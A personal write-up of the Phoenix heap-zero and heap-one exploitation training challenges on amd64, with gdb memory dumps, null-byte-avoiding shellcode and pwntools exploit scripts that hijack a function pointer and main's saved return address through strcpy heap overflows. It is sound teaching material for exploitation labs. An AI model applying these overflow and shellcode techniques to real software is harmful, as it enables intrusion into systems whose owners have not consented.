I want to provide some writeups for the excellent Phoenix challenges. There are plenty of writeups for these exercises, but you don’t know if you truly understood something until you try to explain it to someone else, so here I am trying to do just that.

Introduction

I am fairly comfortable with Stack and Format string exploitation, so at the moment I will focus my attention to the part where I am most lacking: heap exploitation.

I will also attempt the challenges for amd64 as this architecture presents few additional challenges that I see many people bypassed in writeups going for the 32-bit versions (mostly, lots of null-bytes in addresses).

Heap-zero

The first challenge is very straightforward:

We have two functions declared, nowinner and winner. The first is called, and we need to call the second. The program uses two structures, one consisting of a 64bytes array and the second of a function pointer plus some padding.

In the main function the following happens:

  • Two structures (one of each type) are declared
  • A malloc call is used to initialize the data structure
  • A malloc call is used to initialize the second structure
  • The function pointer of the second structure is set to the nowinner function
  • strcpy is used, without boundary check, to copy the command line argument into the first structure
  • The function pointer of the second structure is used to invoke the function

Exploit Strategy

The exploit idea is simple: we need to overwrite the data of the second structure, so that the function pointer rather than being the address of nowinner will be the address of winner.

To do that, we can leverage the strcpy call, as we control the command line argument.

First, let’s observe the memory layout:

b *0x0000000000400b4e

We set a breakpoint just before the strcpy, then we run the program with just a few “A”s.

strcpy@plt (
   $rdi = 0x00007ffff7ef6010 → 0x0000000000000000,
   $rsi = 0x00007fffffffe7a9 → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
   $rdx = 0x00007fffffffe7a9 → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
   $rcx = 0x00007ffff7da5e14 → <mmap64+133> cmp rax, 0xffffffffffffffff
)

We see that the arguments seem to be more or less what we expected. The first argument (rdi) is the destination where the string is going to be copied, while the second argument (rsi) is the source string that will be copied.

If we now jump to the next line of code (with u) we reach just after strcpy returned.

At the target memory we have what we expected:

gef➤  x /40dwx 0x7ffff7ef6010
0x7ffff7ef6010:	0x41414141	0x41414141	0x41414141	0x41414141
0x7ffff7ef6020:	0x41414141	0x41414141	0x41414141	0x00414141
0x7ffff7ef6030:	0x00000000	0x00000000	0x00000000	0x00000000
0x7ffff7ef6040:	0x00000000	0x00000000	0x00000000	0x00000000
0x7ffff7ef6050:	0x00000000	0x00000000	0x00000051	0x00000000
0x7ffff7ef6060:	0x00400ace	0x00000000	0x00000000	0x00000000
0x7ffff7ef6070:	0x00000000	0x00000000	0x00000000	0x00000000
0x7ffff7ef6080:	0x00000000	0x00000000	0x00000000	0x00000000
0x7ffff7ef6090:	0x00000000	0x00000000	0x00000000	0x00000000
0x7ffff7ef60a0:	0x00000000	0x00000000	0x000fff61	0x00000000

We can see that our As are copied to the address that was in rdi. The data structure was 64 bytes, and we can see that we filled approximately half the buffer. After 64 bytes we have 16 bytes of metadata, and then the next chunk (where the second structure is allocated) begins.

We can also see a value 0x00400ace at byte 0x7ffff7ef6060. This is the address of nowinner:

gef➤  p nowinner
$2 = {<text variable, no debug info>} 0x400ace <nowinner>

We could just overflow the buffer with 64 + 16 bytes, reach the function pointer and overwrite it with our winner function. Unfortunately, there is a problem in this case, and the problem is that our winner function is at address:

gef➤  p winner
$3 = {<text variable, no debug info>} 0x400abd <winner>

This address contains not only a null byte (in reality 5 null bytes, but in this case as the memory is conveniently set to 0, it is not a problem), but also a byte 0x0a. This will be replaced by strcpy with a null byte, and will stop copying the string.

In fact, we can first attempt this trivial solution to verify that we can control rip:

gef➤  run $(python -c 'print "A"*80 + "\xbd\x0a\x40"')
[...]
gef➤  x /40dwx 0x7ffff7ef6010
0x7ffff7ef6010:	0x41414141	0x41414141	0x41414141	0x41414141
0x7ffff7ef6020:	0x41414141	0x41414141	0x41414141	0x41414141
0x7ffff7ef6030:	0x41414141	0x41414141	0x41414141	0x41414141
0x7ffff7ef6040:	0x41414141	0x41414141	0x41414141	0x41414141
0x7ffff7ef6050:	0x41414141	0x41414141	0x41414141	0x41414141
0x7ffff7ef6060:	0x004000bd	0x00000000	0x00000000	0x00000000

After the strcpy call, we can verify that the function pointer was correctly overwritten, but the value is 0x004000bd. In fact, strcpy stopped working after the 0a, and the 40 byte is correct just because the nowinner function also has value 40 in that position.

Continuing the execution crashes as expected with:

gef➤  c
Continuing.
data is at 0x7ffff7ef6010, fp is at 0x7ffff7ef6060, will be calling 0x4000bd

Program received signal SIGSEGV, Segmentation fault.
0x00000000004000bd in ?? ()

Redirecting Control

The good news from the previous attempt is that we control rip, so we can redirect execution where we want. The binary has no protections whatsoever, so we have multiple choices.

The way I chose is to write a simple shellcode that will do the following:

  • push the address of winner to stack
  • execute ret

The ret instruction will just take the top of the stack and put it in the rip. Since we specifically pushed (i.e. placed on top of the stack) the address of winner, this function will be executed.

However, this shellcode cannot have null (or 0a) bytes either. To avoid null bytes I have the done the following:

[SECTION .text]
global _start
_start:
	mov rax, 0xffffffffff511bce ; rax = 0x400abd + ffffffffff111111
        sub rax, 0xffffffffff111111 ; rax = 0xffffffffff511bce - ffffffffff111111 = 0x400abd
        push rax ; push rax to the stack
	ret

Now all it’s left is to build the shellcode and extract the opcodes:

user@phoenix-amd64:~/heap-zero$ nasm shellcode.asm -f elf64
user@phoenix-amd64:~/heap-zero$ ld -o shellcode shellcode.o
user@phoenix-amd64:~/heap-zero$ echo "\"$(objdump -d shellcode | grep '[0-9a-f]:' | cut -d$'\t' -f2 | grep -v 'file' | tr -d " \n" | sed 's/../\\x&/g')\""
"\x48\xc7\xc0\xce\x1b\x51\xff\x48\x2d\x11\x11\x11\xff\x50\xc3

The final strategy will be the following:

  • Place the shellcode in the first buffer
  • Add padding until the function pointer to overwrite
  • Overwrite the function pointer with the address of the buffer

We know that the first buffer is at 0x7ffff7ef6010, and we know that to overwrite the function pointer we need 80 bytes, therefore the exploit will be the following:

from pwn import *

context.arch = 'amd64'

data =  0x7ffff7ef6010
shellcode = "\x48\xc7\xc0\xce\x1b\x51\xff\x48\x2d\x11\x11\x11\xff\x50\xc3"

buf = shellcode
buf += "A"*(80-len(buf))
buf += p64(data)

print buf

Running heap-zero with the printed buffer result in the level to be completed.

./heap-zero $(python exploit.py)
-bash: warning: command substitution: ignored null byte in input
Welcome to phoenix/heap-zero, brought to you by https://exploit.education
data is at 0x7ffff7ef6010, fp is at 0x7ffff7ef6060, will be calling 0x7ffff7ef6010
Congratulations, you have passed this level

Heap-one

In the next challenge we are in a slightly more complex situation.

In the code we see that a structure is declared, having an int (priority) and a pointer to string (name) as fields. The winner function is once again declared but not called anywhere.

The main function does the following:

  • declare two instances of the structure
  • use malloc to initialize the first structure
  • set priority to 1 (struct 1)
  • use malloc to initialize the name of the first structure
  • use malloc to initialize the second structure
  • set priority to 2 (struct 2)
  • use malloc to initialize the name of the second structure
  • use strcpy (without boundary check) to copy the first command line argument into name of the first structure
  • use strcpy (without boundary check) to copy the second command line argument into name of the second structure
  • use printf

Let’s first observe the data structures of the binary during a normal execution.

We place a breakpoint right before the puts (printf in the code) call and then run the program.

gef➤  b *0x0000000000400ae7
Breakpoint 1 at 0x400ae7
gef➤  run AAAAAAAA BBBBBBBB
Starting program: /home/user/heap-one/heap-one AAAAAAAA BBBBBBBB

Observing the memory in the heap we see the following:

gef➤  search-pattern AAAA
[+] Searching 'AAAA' in memory
[+] In (0x7ffff7ef6000-0x7ffff7ff6000), permission=rwx
  0x7ffff7ef6030 - 0x7ffff7ef6038  →   "AAAAAAAA" 
  0x7ffff7ef6034 - 0x7ffff7ef6038  →   "AAAA" 
[+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rwx
  0x7fffffffe7b9 - 0x7fffffffe7c1  →   "AAAAAAAA" 
  0x7fffffffe7bd - 0x7fffffffe7c1  →   "AAAA" 
gef➤  x /40dwx 0x7ffff7ef6030-48
0x7ffff7ef6000:	0x00000000	0x00000000	0x00000021	0x00000000
0x7ffff7ef6010:	0x00000001	0x00000000	0xf7ef6030	0x00007fff
0x7ffff7ef6020:	0x00000000	0x00000000	0x00000021	0x00000000
0x7ffff7ef6030:	0x41414141	0x41414141	0x00000000	0x00000000
0x7ffff7ef6040:	0x00000000	0x00000000	0x00000021	0x00000000
0x7ffff7ef6050:	0x00000002	0x00000000	0xf7ef6070	0x00007fff
0x7ffff7ef6060:	0x00000000	0x00000000	0x00000021	0x00000000
0x7ffff7ef6070:	0x42424242	0x42424242	0x00000000	0x00000000
0x7ffff7ef6080:	0x00000000	0x00000000	0x000fff81	0x00000000
0x7ffff7ef6090:	0x00000000	0x00000000	0x00000000	0x00000000

We can clearly see that the name of the two structures is filled with As and Bs, but we can also see the following heap structure:

8 bytes of 0s
--- First chunk ---
0x21 (size 32 for prev chunk) (8 bytes)
0x1 (priority of struct 1) (8 bytes)
0x7ffff7ef6030 (pointer to name of struct 1) (8 bytes)
8 bytes of 0s
--- Second chunk ---
0x21 (size 32 for prev chunk) (8 bytes)
name (struct 1) (8 bytes)
16 bytes of 0s
--- Third chunk ---
0x21 (size 32 for prev chunk) (8 bytes)
0x2 (priority of struct 2) (8 bytes)
0x7ffff7ef6070 (pointer to name of struct 2) (8 bytes)
8 bytes of 0s
--- Fourth chunk ---
0x21 (size 32 for prev chunk) (8 bytes)
name (struct 2) 8 bytes

In particular, it’s important to stress the behavior of strcpy calls:

  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

The first call will take the first command line argument and place it at the address pointed by name. This address at this point is the return value from malloc, we do not control it (0x7ffff7ef6030). The second call will take the second command line argument and place it at the address pointed by name (struct 2). We do not control this address either, but, we do have a strcpy operation without boundary checks that will write before this pointer.

Exploit Strategy

Building on what was discussed so far, the exploit strategy will be the following:

  • Fill the struct 1 name
  • Overflow the buffer until the name pointer for struct 2 is overwritten

This is essentially a write primitive, as strcpy will place for us what we put in the second command line argument, at the address pointed by the value we will overflow the pointer with.

The payload is roughly as follows:

JUNK + WRITE_ADDRESS + WRITE_CONTENT

With a write primitive, one reasonable strategy could be to overwrite a PLT entry (for example for puts, as this function is called right after in the code) with the address of the winner function. This strategy is what for example this writeup highlights, and it’s also the first thing that I thought. Unfortunately, I also faced the same challenge of the author of that writeup, namely that we have a lot of null bytes in the address we need to overwrite (puts address).

=> 0x0000000000400ae7 <+170>:	call   0x400840 <puts@plt>

gef➤  x /3i 0x400840
   0x400840 <puts@plt>:	jmp    QWORD PTR [rip+0x20398a]        # 0x6041d0 <puts@got.plt>
   0x400846 <puts@plt+6>:	push   0x5
   0x40084b <puts@plt+11>:	jmp    0x4007e0

The address of puts in the GOT is at 0x6041d0, but unfortunately, the data we are overwriting is initially:

0xf7ef6070      0x00007fff

If we just skip the null bytes at the beginning, we will obtain 0x7fff004007e0, not 0x00000000004007e0.

We can try this approach just to prove the correctness of our reasoning:

gef➤  run $(python -c 'print "A"*40+"\xe0\x07\x40"') BBBBBBB
Starting program: /home/user/heap-one/heap-one $(python -c 'print "A"*40+"\xe0\x07\x40"') BBBBBBB

Breakpoint 2, 0x0000000000400add in main ()

strcpy@plt (
   $rdi = 0x00007fff004007e0,
   $rsi = 0x00007fffffffe7c3 → 0x0042424242424242 ("BBBBBBB"?),
   $rdx = 0x00007fffffffe7c3 → 0x0042424242424242 ("BBBBBBB"?)
)

Indeed we see that strcpy will try to write at 0x00007fff004007e0 our “B”s.

In order to circumvent this issue, I decided to change approach and rather than overwriting a GOT entry, overwrite some value on the stack.

If we set a breakpoint on the ret instruction of the main function, we see that the stack has the following setup:

gef➤  run AAAAAAA BBBBBBB
Starting program: /home/user/heap-one/heap-one AAAAAAA BBBBBBB
and that's a wrap folks!

Breakpoint 3, 0x0000000000400af2 in main ()

0x00007fffffffe4e8│+0x0000: 0x00007ffff7d8fd62  →  <__libc_start_main+54> mov edi, eax	 ← $rsp
0x00007fffffffe4f0│+0x0008: 0x0000000000000000
0x00007fffffffe4f8│+0x0010: 0x00007fffffffe530  →  0x0000000000000003
0x00007fffffffe500│+0x0018: 0x0000000000000000
0x00007fffffffe508│+0x0020: 0x00007ffff7ffdbc8  →  0x00007ffff7ffdbc8  →  [loop detected]
0x00007fffffffe510│+0x0028: 0x0400000100003e00
0x00007fffffffe518│+0x0030: 0x0000000000400909  →   nop DWORD PTR [rax+0x0]
0x00007fffffffe520│+0x0038: 0x0000000000000000

The top of the stack is at 0x00007fffffffe4e8 and it’s the value that will go in the rip next:

stepi

[#0] 0x7ffff7d8fd62 → __libc_start_main()

Note that this value will change depending on the length of our command line arguments, as those values will determine the stack size as well. Therefore, in order to get the final value, we should run the program with arguments of the same length of our payload. For example, running with arguments A and B we get 0x00007fffffffe4f8.

What we can do then is the following:

  • Fill the buffer
  • Overwrite the name pointer with the address of the main return address
  • Write at that address one address that points to an area we control (for example, the name of the first structure)

Once main will return, the value in the saved return address will be placed in rip, and this will redirect control to our buffer.

The payload then will look roughly as follows:

SHELLCODE + PAD + SAVED_RETURN + ADDR_OF_SHELLCODE

Note that the address of winner has once again a 0a byte:

0x400af3

If that was not the case, we could try to overwrite the save return pointer with the address of winner directly.

Final Exploit

At this point we have all the pieces for the exploit:

  • The address for the buffer where we can place the shellcode is at 0x7fffffef6030
  • The stack address we want to overwrite is 0x7fffffffe4c8 - as we can see with a 40/8 bytes command line arguments.

We are missing just the shellcode, which would be extremely similar to the one for heap-zero:

[SECTION .text]
global _start
_start:
	mov rax, 0xFFFFFFFFFF511C04 ; rax = 0x400af3 + 0xFFFFFFFFF111111
        sub rax, 0xFFFFFFFFF111111  ; rax = 0xFFFFFFFFFF511C04 - 0xFFFFFFFFF111111 = 0x400af3
        push rax ; push rax
	ret

We build the shellcode and extract the opcodes:

"\x48\xc7\xc0\x04\x1c\x51\xff\x48\x2d\x11\x11\x11\xff\x50\xc3"

Finally, we can assemble the exploit:

# -*- coding: utf-8 -*- 
# run $(python exploit.py) $(python -c 'print "\x30\x60\xef\xf7\xff\x7f\x00\x00"')
from pwn import *

context.arch = 'amd64'

data =  0x7fffffef6030
rbp = 0x7fffffffe4c8

shellcode = "\x48\xc7\xc0\x04\x1c\x51\xff\x48\x2d\x11\x11\x11\xff\x50\xc3"

buf = shellcode
buf += "A"*(40-len(buf))
buf += p64(rbp)

print buf

This script will print only the first argument, we need the second argument (the “what” to write, i.e. the address of the buffer - data variable).

Analysis

In order to better understand why the exploit works, we can walk through the code.

We set three breakpoints:

gef➤  b *0x0000000000400ac4
Breakpoint 1 at 0x400ac4
gef➤  b *0x0000000000400add
Breakpoint 2 at 0x400add
gef➤  b *0x0000000000400af2
Breakpoint 3 at 0x400af2

Right after the first strcpy, right before the second strcpy, and right before the ret of main.

Then, we run the program:

gef➤  run $(python exploit.py) $(python -c 'print "\x30\x60\xef\xf7\xff\x7f\x00\x00"')
Starting program: /home/user/heap-one/heap-one $(python exploit.py) $(python -c 'print "\x30\x60\xef\xf7\xff\x7f\x00\x00"')

After the first strcpy we can see that the overflow already happened, and the pointer to name of struct 2 has been correctly overwritten:

gef➤  x /100dwx 0x7ffff7ef6030-48
0x7ffff7ef6000:	0x00000000	0x00000000	0x00000021	0x00000000
0x7ffff7ef6010:	0x00000001	0x00000000	0xf7ef6030	0x00007fff
0x7ffff7ef6020:	0x00000000	0x00000000	0x00000021	0x00000000
0x7ffff7ef6030:	0x04c0c748	0x48ff511c	0x1111112d	0x41c350ff
0x7ffff7ef6040:	0x41414141	0x41414141	0x41414141	0x41414141
0x7ffff7ef6050:	0x41414141	0x41414141  --> 0xffffe4c8	0x00007fff <---
0x7ffff7ef6060:	0x00000000	0x00000000	0x00000021	0x00000000
0x7ffff7ef6070:	0x00000000	0x00000000	0x00000000	0x00000000
0x7ffff7ef6080:	0x00000000	0x00000000	0x000fff81	0x00000000

That will be the where to write, and it’s the stack address that holds the saved return pointer for the main function:

0x00007fffffffe4a0│+0x0000: 0x00007fffffffe518  →  0x00007fffffffe778  →  "/home/user/heap-one/heap-one"	 ← $rsp
0x00007fffffffe4a8│+0x0008: 0x00000003ffffe538
0x00007fffffffe4b0│+0x0010: 0x00007ffff7ef6050  →  0x4141414141414141
0x00007fffffffe4b8│+0x0018: 0x00007ffff7ef6010  →  0x0000000000000001
0x00007fffffffe4c0│+0x0020: 0x0000000000000003	 ← $rbp
0x00007fffffffe4c8│+0x0028: 0x00007ffff7d8fd62  →  <__libc_start_main+54> mov edi, eax
0x00007fffffffe4d0│+0x0030: 0x0000000000000000
0x00007fffffffe4d8│+0x0038: 0x00007fffffffe510  →  0x0000000000000003

Right now it’s not the top of the stack, but we can see that it points somewhere in __libc_start_main.

Continuing the execution, we reach breakpoint 2, right before the second strcpy call, which right now is our write primitive.

strcpy@plt (
   $rdi = 0x00007fffffffe4c8 → 0x00007ffff7d8fd62 → <__libc_start_main+54> mov edi, eax,
   $rsi = 0x00007fffffffe7c4 → 0x4c007ffff7ef6030,
   $rdx = 0x00007fffffffe7c4 → 0x4c007ffff7ef6030
)

We can see that it’s trying essentially to do

*0x00007fffffffe4c8 = 0x007ffff7ef6030

We do not need to worry about the first “dirty” 4c byte, as strcpy will stop copying at the first null byte.

If we check what we have at 0x007ffff7ef6030, we can see our shellcode.

gef➤  x /5i 0x00007ffff7ef6030
   0x7ffff7ef6030:	mov    rax,0xffffffffff511c04
   0x7ffff7ef6037:	sub    rax,0xffffffffff111111
   0x7ffff7ef603d:	push   rax
   0x7ffff7ef603e:	ret    
   0x7ffff7ef603f:	rex.B

In reality this is just the beginning of name for struct 1

0x7ffff7ef6030:	0x04c0c748	0x48ff511c	0x1111112d	0x41c350ff
0x7ffff7ef6040:	0x41414141	0x41414141	0x41414141	0x41414141
0x7ffff7ef6050:	0x41414141	0x41414141	0xffffe4c8	0x00007fff
0x7ffff7ef6060:	0x00000000	0x00000000	0x00000021	0x00000000

After the strcpy call (jumping it with u) we see that:

0x00007fffffffe4c8│+0x0028: 0x00007ffff7ef6030  →  0x48ff511c04c0c748	 ← $rax, $rdi

The value is set correctly, so now we can once again continue and reach our third breakpoint.

Here we can see that the overwritten item is on top of the stack, and if we step one instruction:

stepi

$rip   : 0x00007ffff7ef6030  →  0x48ff511c04c0c748

rip now points at our shellcode, continuing the execution will trigger the winner function.

gef➤  c
Continuing.
Congratulations, you've completed this level @ 1656192533 seconds past the Epoch

The program really crashes after, we could modify the shellcode to include a call to exit(0) if we wanted to avoid the crash and be perfectionists.